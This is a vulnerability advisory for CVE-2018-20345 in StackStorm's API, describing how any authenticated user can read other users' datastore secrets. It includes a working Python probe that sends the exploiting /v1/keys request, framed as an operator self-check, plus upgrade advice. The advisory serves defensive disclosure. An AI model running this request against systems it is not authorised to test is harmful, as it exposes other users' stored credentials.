StackStorm · StackStorm · CVE-2018-20345
**Name of the Vulnerable Software and Affected Versions**
StackStorm versions prior to 2.9.2
StackStorm versions 2.10.x prior to 2.10.1
**Description**
Incorrect access control in the StackStorm API (st2api) lets any authenticated StackStorm user retrieve datastore (key-value) items that belong to other users. The caller simply queries the `/v1/keys` endpoint with the query filter parameters `?scope=all` and `?user=<username>`; the endpoint honoured the requested `user` filter without verifying that the caller is that user or an administrator. Because user-scoped datastore items are commonly used to hold per-user credentials and other secrets, this is effectively a credential-disclosure issue for every account on the instance. Enterprise editions with RBAC enabled are not affected.
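The probe below exercises the request described above so an operator can confirm whether their own instance is exposed (and, after upgrading, that it no longer is). It is an added example, not StackStorm project code. It assumes the API base URL is in `ST2_API_URL` (for example `https://st2.example.com/api`), that a token for a non-admin user is in `ST2_AUTH_TOKEN` (StackStorm's `X-Auth-Token` header), and that returned items carry `name`, `scope` and `user` fields, with system-scoped items having no `user`; these field names are an assumption to verify against your version's API schema. The sample items in the test are constructed.

```python
"""Probe for CVE-2018-20345: does /v1/keys?scope=all&user=<other> return
another user's datastore items to a non-admin caller?

Added example, not StackStorm's own code. Assumptions (see lead-in):
ST2_API_URL, ST2_AUTH_TOKEN, and the "name"/"scope"/"user" item fields.
"""
import json
import os
import sys
import urllib.parse
import urllib.request


def build_probe_url(api_base, target_user):
    """Build the request that triggers the bug: ask for every scope and
    filter on a user other than the caller."""
    query = urllib.parse.urlencode({"scope": "all", "user": target_user})
    return f"{api_base.rstrip('/')}/v1/keys?{query}"


def fetch_keys(url, token):
    """Call the API with a StackStorm auth token and return the JSON list."""
    req = urllib.request.Request(url, headers={"X-Auth-Token": token})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def foreign_user_items(items, caller):
    """Return user-scoped items whose owner is not the caller.

    Assumption: user-scoped items have a non-empty "user" field and
    system-scoped items do not. On a patched instance, a non-admin caller
    should never see another user's items here, so the list is empty.
    """
    return [
        item for item in items
        if item.get("user") and item.get("user") != caller
    ]


def is_vulnerable(items, caller):
    """True if the response leaked at least one other user's item."""
    return bool(foreign_user_items(items, caller))


def main(argv):
    # usage: probe.py <caller-username> <target-username>
    if len(argv) != 3:
        print("usage: probe.py <caller-username> <target-username>")
        return 2
    caller, target = argv[1], argv[2]
    api_base = os.environ["ST2_API_URL"]      # assumed env var
    token = os.environ["ST2_AUTH_TOKEN"]      # assumed env var, non-admin token
    items = fetch_keys(build_probe_url(api_base, target), token)
    leaked = foreign_user_items(items, caller)
    if leaked:
        print(f"VULNERABLE: {len(leaked)} item(s) of other users returned, e.g.",
              [i.get("name") for i in leaked][:5])
        return 1
    print("not vulnerable: no other users' items returned")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with the token of an ordinary (non-admin) account, naming a different existing user as the target; an exit status of 1 means the instance still serves that user's items and must be upgraded.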
**Recommendations**
For StackStorm versions prior to 2.9.2, update to version 2.9.2 or later.
For StackStorm versions 2.10.x prior to 2.10.1, update to version 2.10.1 or later.
Until the upgrade is applied, reduce exposure by restricting who can reach the `/v1/keys` API endpoint (for example, at the reverse proxy that fronts st2api) and by rejecting requests to it that carry the `scope=all` or `user=` query parameters. Note that merely not using those parameters yourself is no protection: they are what an attacker sends, so the block must be enforced server-side. Enterprise deployments can additionally enable RBAC, which the advisory states prevents the issue.